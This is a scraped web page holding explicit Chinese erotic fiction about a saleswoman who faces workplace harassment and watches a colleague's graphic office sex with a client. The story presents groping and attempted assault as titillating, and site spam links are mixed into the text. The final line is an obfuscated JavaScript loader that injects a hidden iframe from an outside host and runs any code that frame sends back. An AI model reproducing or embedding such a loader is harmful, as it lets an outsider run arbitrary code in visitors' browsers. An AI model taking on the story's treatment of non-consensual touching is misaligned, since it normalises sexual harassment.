字幕網- 每日更新 永久免費

一個漂亮女人,因為美麗就有著幾乎不同的待遇,可以事事順利,馬到成功。

  吳穎就是事半功倍的女人,在大學畢業招聘會上就被各家公司搶著要,甚至有兩個人事經理為她鬧的有點不愉快,而這些吳穎早就習以為常。從青春期那年開始發育,吳穎就發現自己開始招人喜歡,課桌的抽屜裏經常有男生寫來的情書,放學回家護花使者絡繹不會,走到哪都是焦點。

  最終,吳穎選擇了一家從國企轉製後的鋼材公司,做起了銷售顧問。這家公司有著深厚的政治背景,據說是省裏麵多位領導都有入股,交給職業經理人來管理。

  吳穎憑借著天生麗質和負責招聘的副總經理王國新的殷勤幫助,很快就送初級銷售顧問升為高級銷售顧問,隻花了三個月的時間,打破了由陳潔保持的半年記錄。

  陳潔也是個漂亮的女人,柳眉鳳目,紅紅的嘴唇略微寬厚搭配尖俏的下巴,卻更添性感,有點香港明星舒淇的味道,豐滿高聳的酥胸,常常把裙子撐的鼓鼓騰騰,深深的乳溝惹人遐思,纖細的腰肢,豐腴的美臀,凸凹有致。一些毅力稍微不夠的采購經理在酒桌上就被誘惑的沒有思考能力,草草地把合同一簽,便和陳潔共度春宵,事後才發現合同的細節讓陳潔占了便宜。

  公司裏麵早有傳聞陳潔是靠身體和客戶簽合同的,所以當人們發現吳穎的銷售業績突飛猛進,而吳穎比陳潔更加高挑美麗,自然也是謠傳不斷。別的不說,172的身高,那筆直修長的美腿,就讓吳穎和陳潔並排而行的時候更吸引男人的目光。

  這一天,又到了下班時間,吳穎也下班了,隻見她身材修長,兩條柳葉彎眉,筆直秀麗的鼻子,秀挺的鼻子下麵,是櫻桃小口,輪廓分明的嘴唇豐滿紅潤,誰見了都有一種想親吻的欲望,雪白的脖子下,漂亮又不失性感的職業OL套裝裏聳立著兩座挺拔的玉女峰,再往下是迎風擺柳的細腰和渾圓的香臀。遠遠看去,一個有著十分出眾的身材和容貌美豔少婦,她的身段高挑,大腿頎長,圓潤柔和的臉型,一雙清澈透明讓人幾乎不敢正視的眼睛,還有那一頭流光閃動的披肩發,加上她那發育完美的嫋娜的豐臀,以及高聳飽滿的乳峰,渾身上下都閃動著誘人的美麗,讓人情不自禁的產生出一種九天仙子染足凡塵的感覺,那種超凡出世的驚豔足以讓任何一個正常的男人在一瞬間顛倒迷醉。

  吳穎捧著客戶送的花正要的走出公司,她發現最近在下班的時候有幾個公司新來的實習生都會在大門旁邊假裝抽煙聊天,其實是在等她下班路過看上幾眼。

  離開學校兩年了,看到這些學生模樣的新人,吳穎也是感覺一絲親切,偶爾路過時打個電話,這樣走的慢一點,能讓他們都看一眼。

  [ 叮……叮……叮] 吳穎的手機響了,吳穎一看,是副總經理王國新打來的。

  [ 喂,王總啊,我都到公司門口了,你不會叫我去加班吧?] 吳穎輕盈又帶一絲嫵媚的聲音,讓旁邊的幾個實習生都醉了,開始談論起來。

  [ 你王哥是那樣的人嗎,是給你加餐的,高老板說今晚有空,要和你喝一杯。

  ]

  [ 是嘛,可真是不巧啊,我家裏來客人了,我得回家招待,你把電話給高老板] 吳穎說著,電話那頭換了個聲音。

  [ 喂,吳小姐這幺忙啊,下班回家還要簽單子?]

  [ 沒有啦,是我老公的領導要來,我這也沒辦法,不然衝您今天送我的這一束藍色妖姬,我一定陪您喝個痛快!] 吳穎說著這看似推脫的話,不知道高凱是怎幺想的,會不會認為自己不給麵子。畢竟上次給了她一單上千萬的合同,自己也隻是給他親了親嘴,這已經是自己的底線了。

  吳穎明白高凱是個有很有實力的人,從他的談吐和見識,吳穎知道他在這座城市也是要風得風,要雨得雨,不好得罪。但是高凱卻不像其他有錢的客戶那樣,一知道不能跟自己上床,說翻臉就翻臉。高凱還是會主動送吳穎禮物,時不時聯係自己,看看有沒有什幺能幫得上忙的。

  經過一番討價還價,吳穎答應周末和高凱,陳潔,王國新去吃一家新開的海鮮酒店。吳穎掛掉了電話,不小心一頭正麵撞上保安老何,整個身子倒在了老何的懷裏。老何眼疾手快,一隻手扶著吳明的柳腰,一隻手卻捏到了吳穎豐滿高挺的奶子上。

  [吳大美女你沒事吧]老何一臉淫笑著說

  [ 腿有點疼……] 吳穎發現有點不對勁,才發現老何的手在自己的乳房上麵揉捏著。

  [ 你幹什幺,快點拿開,你個流氓。] 吳穎怕被人發現,小聲而又帶有訓斥地說。

  老何又捏了一下,才一臉壞笑地放開手,吳穎瞪了老何一眼,罵道: [你去死吧!] 說完,不顧一已經退到大腿根部的短裙和掉落的鑰匙,大步離開公司。

  走出公司才發現裙底走光,才匆忙整理,回頭看了一下老何和那幾個實習生,發現他們的眼睛都快要噴出火來了。吳穎一邊生氣,一邊發現自己還有點小興奮,看著這些男人不帶掩飾的情欲目光,感覺小腹有點暖暖的。 [我的內褲是不是被看到了,這些男人怎幺感覺要吃人似的] 吳穎越心裏越有點心跳加快,臉上不自覺泛起了一點潮紅。

  簡單整理完,吳穎打車回家。上車後想想剛剛被老何占了便宜,真是氣不打一處來。

  自己剛進公司的時候,這個保安想蒼蠅一樣在周圍轉著。有一次穿的絲襪勾破了,剛在廁所退下來,放在洗手池邊就不見了。下班去保安室拿快遞,發現自己絲襪竟然在桌子底下,還有精斑。剛入社會的吳穎嚇壞了,往後見著老何都繞著走。

  直到一次自己在公司門口不遠的地方被三個流氓圍住,路過的人都事不關己的走開,精彩盡在dedelao.com眼看著流氓要非禮自己,老何衝了出來,一個打三個還不落下風。三個流氓喝了酒,看著吳穎這個大美人,肌膚嬌嫩的仿佛少女一樣,身穿一套淺藍色低胸套裙,一雙肉色透明水晶絲襪包裹著的玉潤渾圓的修長美腿,從剪裁考究的短裙露出來,給人一種骨肉勻婷的柔軟魅惑,婀娜纖細的柔軟柳腰,配上微隆的美臀和翹挺的酥胸,雙峰顯現,身材玲瓏,渾身線條玲瓏浮凸,該細的細,該挺的挺,真是個絕色尤物,哪裏肯收手,紛紛拿出了砍刀,向老何砍去。

  老何赤手空拳,被砍了十幾刀,血都流到了地上,還是保護著身後的吳穎。

  終於警察趕來了,老何才混到在地上,被送往醫院。在醫院,吳穎看到老何的傷口流著血,有一個都可以看到骨頭了,流著淚,不顧老公劉彬的反對在病床旁守了老何兩天,第三天老何終於醒了,開口第一句話竟然是,[ 吳大美女,你的奶子好白啊].吳穎才發現自己衣領太低,走光了。

  [ 你個流氓] 吳穎邊這幺說,邊整理衣服,一點責怪的意思都沒有。現在老何要是占她點便宜,她也就不跟她計較,偶爾還挑逗一下老何,在老何把持不住的時候又輕巧離去,隻留下老何硬著下身回去打飛機。

  吳穎想著老何這個色保安,搖搖頭,不去想他。反倒是剛剛的電話有點奇怪,高老板明明說周末要飛北京,怎幺還會有空在這裏吃飯。剛剛是王國新提出的要求,難道是副總經理騙自己出來吃飯?

  但是高老板人就在旁邊啊,副總經理不能這幺口無遮攔,要不打個電話問一下高凱。

  吳穎剛想打電話,老公劉彬卻打來了。

  [ 老婆,你快到家沒,趙局都久等了。] 劉彬問到。

  [ 快到了,再10分鍾,你買菜了沒,先洗洗,再切一下肉,我回去煮比較快。] 吳穎說。

  [ 好,我先去洗菜,你快點。] 劉彬放下電話,對建設局的趙局長說, [趙局招待不周,您先自己坐會兒,我去洗菜。

  [ 小劉你這裏裝修風格很像我家,我感覺像回家一樣,來來來,我幫你自己洗。] 趙建軍說。

  [ 您來吃飯就很給麵子,怎幺能麻煩客人呢,您坐,我先給您泡個茶。] 說著劉彬去廚房拿茶葉,出來的時候發現趙建軍起身,左顧右盼地往主臥室走去,問道[ 趙局找什幺呢?]

  [ 衛生間應該不是這裏,應該是左邊這裏] 趙建軍說。

  [ 是的] 劉彬泡著茶,還是覺得有點怪怪的。

  吳穎中午聽到趙建軍要來吃晚飯,也是皺起了眉頭,第一次在老公同事的婚禮上見到自己,就開始瘋狂地追求自己,不顧雙方都是早已成家的人。曾一度表示隻要吳穎願意,她老公劉彬馬上就可以當上設計院最年輕的科長,還可以每個月給吳穎一筆錢,包養她。吳穎明白他的意思,禮貌地回絕了。

  後來,趙建軍也是時常打電話給吳穎,約出來吃飯,看電影,但是吳穎每次都帶著劉彬,劉建軍沒有機會,反倒是劉彬覺得領導聽照顧自己的,工作時信心十足。

  想著想著,吳穎到了家門口,卻發現自己的鑰匙不見了,一時找不到,隻能叫劉彬開門。

  門開了,開門的不是劉彬,是趙建軍。

  趙建軍一開門,就看到吳穎領口間胸前那一片白嫩得近似透明的玉肌雪膚,和周圍潔白的襯衣混在一起,讓人幾乎分不開來。雪白領口下,一對豐滿挺茁的酥胸玉峰正急促地起伏不定,誘人瑕思。幾周不見,發現吳穎顯得氣質高貴典雅,美麗絕色,她細滑的肌膚晶瑩雪白,嬌嫩無匹,渾身上下洋溢著成熟少婦的豐韻和高級白領的氣質,真的讓人陶然欲醉,砰然心動。

  [ 趙局長怎幺是您呢,我老公呢?] 吳穎看趙建軍盯著自己的領口看呆了,便問道。

  [ 劉彬在切肉,我來給美人你開門,請進請進!] 趙建軍隻要劉彬不在場,便會毫不掩飾地勾搭吳穎。

  吳穎怕他在家裏做出什幺不雅的舉動,就大聲說 [老公我回來了,菜洗好了沒,怎幺能讓趙局來開門].說著走進屋裏。

  吳穎回家後就在廚房準備飯菜,趙建軍則和劉彬在客廳討論工作上的是,期間吳穎聽到趙建軍說這次準備選拔科長的事,劉彬的成績是得到認可的,隻要領導同意,科長肯定是老公當。

  一個小時候,飯菜準備好了,劉彬也拿出特地買的茅台酒,準備和趙建軍喝上。吳穎知道自己老公酒量不行,邊自己也準備了被子,幫老公分擔一點。

  開飯了,趙建軍一邊吃著,一邊誇劉彬年輕有為,還取了個這幺漂亮的老婆,上得了廳堂,下得了廚房,真是人生贏家。領導這樣說,劉彬自然不敢怠慢,杯杯都是先幹為敬。不知不覺,喝醉了,趙建軍則還是很精神,和吳穎喝著。

  吳穎看這情況,再喝下去,怕是自己也要醉了,看老公已經快倒到桌上,伸手去扶,說到 [趙局真不好意思,我先付他進去。]

  趙建軍也起身說 [我幫你一起].劉彬被趙建軍和吳穎一左一右地扶上了床。

  吳穎剛給他蓋好被子,一轉身,發現趙建軍正看著自己,眼神裏仿佛在說,老子等這一刻已經好久了。

  趙建軍低沉地喘著氣向吳穎走去,吳穎嚇得退到了牆邊,說[ 趙局長,你沒事吧,我去那杯水給你喝。]

  趙建軍看吳穎要跑,顧不得在旁睡覺的劉彬,一把撲向吳穎,沒想到踩到地上的一個東西,摔了個狗吃屎。吳穎嚇了一跳,忙去扶趙建軍,發現讓趙建軍滑倒的是一個U盤,但是這個U盤不像是家裏的。

  趙建軍被吳穎扶起來,看見那個U盤,慌張地去撿,說[ 原來在這裏啊,剛剛掉了。]

  [ 來,您收好] 吳穎先一步拿到那個U盤,看了看沒什幺特別的,還給了趙建軍。經過剛剛這幺一摔,趙建軍也是摔疼了,拿著U盤看都不看就塞進口袋,好像做錯事的孩子,簡單地和吳穎到了個別後,離開了。

  趙建軍走了之後,吳穎慶幸那個U盤幫了自己,不然的話還不知道喝了就的趙建軍會對自己做什幺。這個家夥真的能不怕劉彬在旁邊就非禮自己。吳穎收拾著飯菜,突然想到自己的鑰匙可能是下班時候撞到老何的時候掉了,覺得整理完去公司找找。

  半個小時後,吳穎帶上備用鑰匙,打的到了公司,想去問問老何有沒有看到,但是哪裏都找不到老何。走著走著,走到了銷售部的辦公室附近,發現那裏的燈亮著,心想這幺晚了,應該是老何在裏麵吧。

  吳穎走到離辦公室20米的地方,看見裏麵有兩個身影,還有女人的嫵媚笑聲。

  [ 恩哈哈,張老板,這裏就是吳穎的工位了,你就這幺好奇?就算她漂亮,位置和別人是沒有區別的呀。] 陳潔的生意從裏麵穿過了。

  [ 位置是沒什幺好看,我是在這裏好好地看看陳小姐。] 張冬青說。吳穎看見那個張老板說著摟住了陳潔的腰,手撫摸著陳潔的翹臀。吳穎一下子呆住了,換亂中躲到了一張桌子的後麵,心想:都說陳潔和客戶的關係不一般,利用美色和客戶簽合同,這回算是見到了,這個張冬青,知道上不了自己,竟然拉陳潔來辦公室,還在我的位子上亂搞。

  第二章

  想著想著,吳穎又好奇地伸出頭,透過銷售部辦公室的玻璃,看著裏麵的兩個人。

  這時張冬青摟抱著陳潔坐在他的大腿上麵,伸手輕輕撫摸著陳潔肉色透明水晶絲襪包裹著的嬌嫩渾圓的大腿。

  [ 張老板晚上是不是想我扮作吳穎,在這裏幹我呀?你剛剛吃了藥,我可是怕了你的,你看我這腿都發軟了。] 陳潔說著,抬起肉絲美腿磨蹭著張冬青的褲襠,一邊嬌喘籲籲,粉麵緋紅起來。

  吳穎看到陳潔這幺快就動情了,心想:陳潔真騷,王冬青把她當做自己都不在乎,還長得這幺漂亮,怪不得能在短短半年之內升職為高級顧問,一般人都要一年。

  [ 陳小姐不要吃醋呀?!看我以後怎幺收拾她?!] 張冬青溫柔愛撫著陳潔的大腿,壞笑道,[ 今晚現在這裏把你辦了]

  陳潔嬌喘籲籲地說道:[ 嗯……嗯……你們男人總是不知足,之前你還說有了我,不會再想其他人了嗎?]

  張冬青大笑道:[ 陳小姐還是吃醋了,我可是大色狼哦!] 說著色手在陳潔翹挺渾圓的臀瓣上揉捏一把,美臀結實嬌嫩,彈力驚人。

  [ 色狼,一點兒都不像啊!] 陳潔嬌喘籲籲,她頓了一下,嬌羞嫵媚粉麵緋紅地低聲說道 [是色鬼,人家讓你揩油,揩得都動情了。] 她說完臉上便布滿紅暈,把手伸到張冬青的懷裏,手指畫著圈挑逗張冬青。

  張冬青笑道:[ 陳小姐果然是天生媚骨啊!今天這幺誘惑我的,我不把對吳穎的火發泄在你的身上,對不起陳小姐的一片心啊!]

  [ 那我現在就開始吃你豆腐了。] 張冬青說道,同時手伸向陳潔那豐滿高聳的胸部。

  陳潔輕輕閉上眼睛,靜靜等待張冬青的動作,胸脯起伏得很厲害,一聳一聳的。張冬青有意要逗一逗陳潔,吊吊她的胃口,所以把手停留在她胸前的上空,久久都沒有放下去。

  陳潔閉著雙眼許久了,乳房上還是空空的,並沒有人來采摘。陳潔心中不禁有些奇怪,說到道:[ 張老板難道我的奶子沒有吳穎的大,沒有她的挺,你就隻喜歡摸我的絲襪大腿嗎?] 陳潔睜開眼睛。

  張冬青等到她一睜開眼睛,手迅速一移,在她的小蠻腰上哈起癢來,同時淫笑道:[ 嗬嗬!你這幺想要我摸你的胸部啊?我的陳小姐,是不是春心大動了呢?!

  ]

  [ 不要呀!張老板,嗬嗬!癢……饒了我吧!] 陳潔大叫起來,拚命的笑著,少婦的胴體在張冬青的懷裏不停扭動著,躲避著,喘息籲籲地嬌嗔道,[ 張老板大壞蛋……你……嗬嗬!你敢……敢戲弄人家,人家……人家不來了。] 陳潔一邊笑到喘不過氣來,一邊眉目含春地嬌嗔著。

  張冬青停下手,壞壞的看著陳潔,隻見她身子亂扭,嬌挺渾圓的乳峰不時摩擦著張冬青的胸口,俏臉由於大笑而扭曲著,宛如花枝亂顫一樣,過了許久她才停止大笑,大口大口的喘著粗氣,正在這個時候,張冬青突然低下頭,吻在她的小嘴上,一下子堵住她正在喘氣的小嘴,手同時覆蓋住她那嬌挺豐滿的玉女乳峰,用力的揉搓著。

  陳潔一時沒有反應過來,並且由於小嘴被堵住了,喉間發出[ 嗚嗚] 的聲音,一股興奮的激流迅速蔓延全身。

  陳潔小嘴回應著張冬青的親吻,含住張冬青的嘴唇舔著吸著,丁香小舌在張冬青侵襲之下無處藏身,很快就被張冬青的舌頭黏上,之後她攪動著,和張冬青互相交換彼此的香津。

  張冬青色心大起,更加熱情的親吻著陳潔的櫻唇,糾纏著她的香舌,在她的嘴裏攪動、翻滾著,手裏也自然的加大力度,用力揉捏著她那嬌挺豐滿的乳峰。

  [ 唔唔唔!] 由於陳潔的櫻桃小口被張冬青堵住了,發出模糊不清的呻吟。

  陳潔心裏有一種莫名的興奮感,她想不到張冬青今天竟然這幺熱情,應該是自己在吳穎的座位上,他把自己當做了吳穎。以前接吻的時候都沒有這幺厲害,像一個流氓似的,有一種被調戲猥褻的感覺,這種特別的刺激讓她激動起來,全身宛如通電一樣輕輕的顫動著,身子又酥又麻。

  陳潔的情欲很旺盛,很快就被張冬青挑逗得渾身顫抖,嘴裏發出[ 嗚嗚] 的呻吟之聲。過了良久,張冬青才吐出她的香舌,手也放輕了力度,輕輕的揉摸著她嬌挺豐滿的乳峰,並笑嘻嘻的看著她。

  陳潔大口大口的喘著粗氣,胸脯的起伏更大,每一次起伏的力量都象是要把張冬青的手彈開來一樣。

  [ 怎幺樣?我接吻的技巧有進步吧?] 張冬青淫笑地陳潔問道。

  [ 嗯!又酥又麻的,很興奮,有種通電的感覺,可是後來的時候又很癢,心裏好像有貓爪在搔一樣,就想要你用力的親吻人家,用力摸人家的奶子,而且……而且下麵好像流水了。] 陳潔癡癡的說道,描述得很傳神,說到最後,她滿臉通紅,嬌羞的低下頭,聲音像蚊蚋一樣,幾乎低不可聞,陳潔知道,這樣能記起男人的性欲。

  張冬青被陳潔這幺一勾,把陳潔抱了起來,扔到了桌子,然後開始脫衣服,陳潔看著張冬青脫衣服,粉紅的臉頰上全是嫵媚的神色,一雙小腳來回蹭著,把高跟鞋踢掉在地毯上,雙腿修長筆直,黑色衣裙的領口處乳溝清晰可見,一片白嫩。

  陳潔看張冬青色心大起,手托著乳房說 [這裏好難受的,好像要].

  [ 騷貨,看我不幹死你] 說著張冬青脫掉了內褲,大肉棒已經挺立,粗大肉莖上那紫色的大龜頭很是嚇人,[ 來,騷貨,幫哥吹一下。] 張冬青拉著陳潔的小手放到大肉棒上撫摸著。

  [ 別吹了,都硬了。] 陳潔嗔道,芊芊細手在張冬青粗大的肉莖上套弄著。

  [ 吹幾下就好,剛那會兒,在車裏沒吹爽,老婆的電話不能不接啊。來,這次慢點吹,別再給我整射了。] 張冬青已經站到桌子邊上,背對著玻璃,拉著陳潔跪到他胯間。陳潔沒有說話,從她身子緩慢的搖動中看出,已經在給張冬青口交了。

  [ 別光舔龜頭,卵蛋也舔舔。] 吸吮聲不斷的傳來,陳潔的一隻手把著張冬青的大腿,吳穎這個角度偶爾能從張冬青的胯間看到陳潔伸出紅嫩的舌頭舔吸著卵蛋的樣子,纖細的腰間在張冬青肥粗的兩腿間顯得特別小巧,黑色的裙子把美腿都蓋住了。

  吳穎第一次看到口交是這樣的,一時間瞪大了雙眼,仔細看著。

  [ 好舒服,陳小姐真會舔啊,我老婆從來不給我吹,我那情人也沒你吹的這幺好啊。跟你整一回,賽過活神仙啊。哈哈。] 張冬青猥瑣的笑著,手伸到陳潔衣裙裏,在胸口前摸索著。張冬青摸了會陳潔豐滿的乳房,又用力的挺動了幾下臀部。

  [ 行了,夠硬了,騷貨,我們開整吧。] 說完,吸吮聲停止了,站到桌子邊,肥胖的身材全是肉,陳潔還在地上抿著嘴,美腿被人一拽,背對著張冬青。張冬青扶了扶陳潔的臀部,拍打了一下,騷貨,屁股翹起來,這回站著著幹,看你穿衣服的樣子更騷。」張冬青把陳潔的黑色連衣裙撩到腰間,雪白的臀部立即漏了出來,陳潔站到了地毯上,穿著肉色的修長美腿向兩邊叉開著,白嫩翹臀間,烏黑的陰毛閃著水光,隱約能看到粉紅的陰唇,竟然沒穿內褲?!

  吳穎心想,她就不怕被人看到嗎?

  [ 別把衣服弄髒了。] 陳潔微微彎曲著腿向兩邊叉開,雪白的兩瓣圓臀高高翹著。張冬青踮起了腳,握著粗大的肉莖抵到陰唇間,來回刮弄了幾下,找準了位置,緩緩的插了進去。

  [ 啊……嗯……嗯……] 陳潔雙腿不停顫動,背部已經弓了起來。

  [ 騷貨,你看你爽的流那幺多水] 張冬青把住陳潔的細腰,挺動著粗大的肉莖在兩腿間緩慢抽送著,肥肥的肚子不停的撞到雪白的翹臀上,吳穎能隱隱看到肉莖進出嫩穴的畫麵。

  [ 嗯嗯啊……嗯嗯呃啊……恩……嗯嗯……] 在張冬青緩慢有力的抽插下,陳潔嬌聲呻吟著,身體在黑色連衣裙和絲襪的襯托下顯得白嫩耀眼,上身已經半趴到了桌子上,黑色的連衣裙隨著撞擊滑落,光滑的後背漏了出來,隱約能看到一對豐滿的大奶子在衣服中晃動,看來連胸罩也沒有帶。

  [ 嗯嗯啊啊……輕點……啊張老板……嗯嗯嗯啊……輕點……嗯嗯呃啊……] 張冬青的抽插越來越猛,圓潤的雪臀被撞得啪啪作響,水漬拍打的聲音也不斷從肉體交合處傳來,陳潔雙手在桌子上胡亂的抓著,身體隨著張冬青猛烈有力的抽送不停顫動。吳穎心想,看來40來歲的張冬青也是個玩女人的高手,看得出,陳潔被插的快感一波又一波。

  [ 啊嗯啊嗯……啊啊嗯嗯……張老板……啊嗯嗯……我不行了……嗯嗯啊……] 在張冬青百餘下的來回抽插中,陳潔已是嬌喘連連。吳穎從未聽過這幺高昂的呻吟,完全忘記了自己是個有家庭有老公的賢惠妻子,雙腿大大的叉開,手不自覺伸到私處輕輕地揉搓,心想:要是劉彬也會這樣做愛就好了,每次都是男上女下,經常不到3分鍾就完事了。再看陳潔身體幾乎全貼到了桌上,隻有雪白的圓臀還在努力的向後翹著,像是追求更猛力的抽插。

  [ 騷貨,爽吧?哥哥背後給人叫成打樁機,還有幾個更爽的招式等會兒讓你嚐嚐。] 張冬青迅猛有力的挺動著大肉棒,不停進出著陳潔濕滑的陰部,粉紅的陰唇都已經向外翻起,粘稠的淫液快要連成一條線滴落到地毯上,你這身材,這逼,真是個天生的騷貨,聽說你的業績不必吳穎差,相比讓不少人幹過。但怎幺還是又緊又滑的。把握不好,就像剛才一樣,沒幾下就給你整射了。] 張冬青手伸到衣服裏,在陳潔圓鼓鼓的胸部上大力揉搓著。

  [ 嗯嗯嗯啊……求你了……嗯嗯……停下吧……嗯嗯呃啊……我快……嗯嗯……快被你弄死了……嗯嗯嗯啊……] 陳潔看著幾乎虛脫,身體已經沒了力氣,靠在了桌子上,兩腿還在顫動著。

  [ 你這逼啊還會吸人。哥也快要射了。] 陳潔聽到張冬青說完,把身體撐了起來,雪白的臀部向後挺送著,腰間不停扭動,頭埋在雙手間不停低聲呻吟。張冬青捏住兩片雪臀,腰部迅速有力的抽插著大肉棒,每下都頂的很深,連續挺動了數十下後,用力一頂,抱著陳潔的腰間就不動了。

  兩個人摔倒在地毯上,陳潔像青蛙一樣趴在地毯上一動不動。過了許久,陳潔爬了起來,擦拭著下體和地毯,張冬青坐起身來,點了根煙。

  陳潔光著身子,蹲下身拿掉到地上的包準備補個妝。

  [ 找什幺?] 張冬青抽著煙問道。

  [ 沒,準備去補個妝。] 陳潔低著頭說,拿出了化妝盒,快速的不了妝,然後脫下肉色絲襪。

  [ 這個絲襪你帶走吧,我不能要。] 陳潔把脫下的絲襪遞給張冬青。

  [ 也好,留個紀念。] 張冬青接過絲襪放到麵前聞了聞,[ 還有你的味道。

  真香。] 陳潔看了他一眼,竟然臉紅了,吳穎不知道陳潔是不是裝的。

  張冬青抽完了煙,翻著衣服口袋,掏出一粒藥丸吃了下去,沒過一會,光著身體,又把陳潔拉入懷中。

  [ 幹嘛呀,你今天怎這幺興奮,又吃藥。] 陳潔在掙紮著,明白張冬青晚上想的肯定是吳穎。

  { 騷貨,我們再幹一次。] 張冬青又說到。

  吳穎透著玻璃看到張冬青跟陳潔抱在了一起,陳潔掙紮了幾下就沒聲音了。

  [ 嗯嗯……] 陳潔嬌喊著。

  [ 你咋長的,奶子這幺大這幺軟。] 張冬青問道[ 嗯嗯……我哪知道。……嗯嗯……] 陳潔竟也爭辯道。

  [ 騷貨,再給我吹一下,我就喜歡你給我吹。] 張冬青說。

  [ 不要了,上麵都是精液] 陳潔撒嬌地說。

  張冬青盯著陳潔看,陳潔沒有說話,猶豫的站了一會,又跪在張冬青兩腿間,握住半軟的陰莖,低頭緩緩的張開嘴,主動含住了大龜頭,頭部慢慢滑動了起來。

  吞了不一會,陰莖開始變大變粗,陳潔吐出碩大的龜頭,側著臉伸出舌頭在龜頭和肉莖上舔掃著,然後含住卵蛋一陣吸吮,像是很細心的樣子。

  看著淫蕩的畫麵,吳穎驚呆了,陳潔雖然不比自己漂亮,也是個人見人愛的美女,沒想到她會主動為男人人舔吸陰莖兩次。還用這幺嫻熟的動作。

  陳潔給張冬青口交了幾分鍾,陰莖已經變的無比堅挺,張冬青扶起陳潔的頭,把她橫在地毯上。分開她修長的雙腿,握住粗大的陰莖蹭了幾下陰唇就插了進去。

  [ 嗯啊……慢點來,疼。] 陳潔嬌喘著,雙腿盤到了張冬青的腿上,圓臀也高高的翹起,粗硬的肉棒連根沒入粉嫩的小穴中。

  [ 嗯嗯嗯啊……嗯嗯嗯呃。啊嗯嗯……] 陳潔被插的呻吟連連,張冬青奮力抽送著肉莖,用手捏弄著晃動的軟肉,手指來回撥弄著風中殘燭一樣的乳頭,大嘴在陳潔的粉頸上舔吸著。

  幹了一會,張冬青把陳潔抱了起來,讓陳潔坐到他胯間,他把住陳潔的肉臀,下身來回挺動著,吳穎看到紫黑的粗大陰莖進出陳潔白嫩的身體,雪白的臀部微微翹著,粉紅的陰唇被抽插的向外帶出,白色的粘液粘貼在交合的陰毛處,濕濕的一片。

  [ 啊啊……嗯啊啊……受不了了……啊嗯嗯啊……] 陳潔靠在這個中年男人的肩頭不停的嬌喘,隨著粗大肉棒不停的抽插,吳穎感覺到陳潔粉嫩的身體已經被快感完全征服了。

  [ 嗯嗯嗯啊……我又要來了……嗯嗯……別……嗯嗯……別動了……嗯嗯嗯啊啊嗯嗯嗯……] 張冬青用力的抽插了幾下,頂到了陳潔嫩穴的深處停止了動作,隨後陳潔的身體開始痙攣,胸部完全挺起,腰肢亂顫,雪臀不停抖動著,陳潔高潮來了。

  [ 爽吧?騷貨,起來吧。我們換個花樣。] 過了一會,張冬青把高潮過後的陳潔抱了起來,橫放到了桌子上,扒開陳潔的陰唇又插了進去,陳潔光著雪白的身體,被張冬青按在桌子上,濕潤的陰唇間一根粗大猙獰的肉棒快速進出著殷紅粉嫩的肉穴。陳潔的雙腿已經被按到了胸前,細長的雙腿架在男人的手臂上顫動著,眼睛微微閉著,性感的紅唇微微張開,嫵媚粉紅的臉頰上,眉頭稍稍皺起,不知是生痛還是快感。

  太近了,看著她那淫媚滿足的表情,聽著陳潔婉轉羞澀的呻吟,還有那啪滋,啪滋」的淫穢聲響,吳穎感覺仿佛自己也被人用粗大的肉棒幹著,而且被幹到高潮迭起。我是不是在發神經了?難道這才是我的真麵目?不可能,我是愛劉彬的,這不是我的本性?吳穎不知道晚上和趙建軍喝了酒,又看了這幺香豔的春戲,讓自己也動了情。

  當吳穎回過神來的時候,陳潔和張冬青又滾到了地上,陳潔跪在地毯上,被張冬青從後麵插了進去,圓滑雪白的翹臀高高挺起,修長的大腿用力分開,胸前豐滿的奶子像風中的燈籠一樣隨著大肉棒的撞擊來回晃動,柔軟雪白的肉臀,被男人拍打撞擊卷起一陣陣肉浪。

  [ 啊……啊……不行了……別……啊……嗯嗯啊……] 陳潔的呻吟聲已經變成完全的快感嬌喘,聽得出她又要高潮了。張冬青抽出了肉棒,把一隻美腿高高的抬了起來架到肩上,把另一隻美腿坐到身下,摸了摸濕潤的陰唇,挺著粗硬的肉棒在兩腿間滑動著,又插了進去使勁的幹了數分鍾。

  [ 嗚嗚……嗯嗯啊……我真……啊嗯嗯呃啊……太……太粗了……嗯嗯啊啊……真受不了了……嗯嗯嗯啊啊……嗯嗯嗯……] 在猛烈的抽插下,陳潔開始強烈的痙攣,像是抽經一樣,全身挺了起來,張冬青隨後用力抽送著粗大的肉棒,迅速猛力的抽插了幾十下,停在陳潔痙攣的陰道中顫抖起來。兩人疲倦的趴在床上依靠著,陰莖還插在陳潔的陰道中,過了好久都沒有動。

  
【完】


字節:21285[ 此帖被zhouj614在2015-11-05 22:14重新編輯 ]

上一篇:Sena Nagakura永倉せな_[58P] 下一篇:少女映畫26[88P]
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};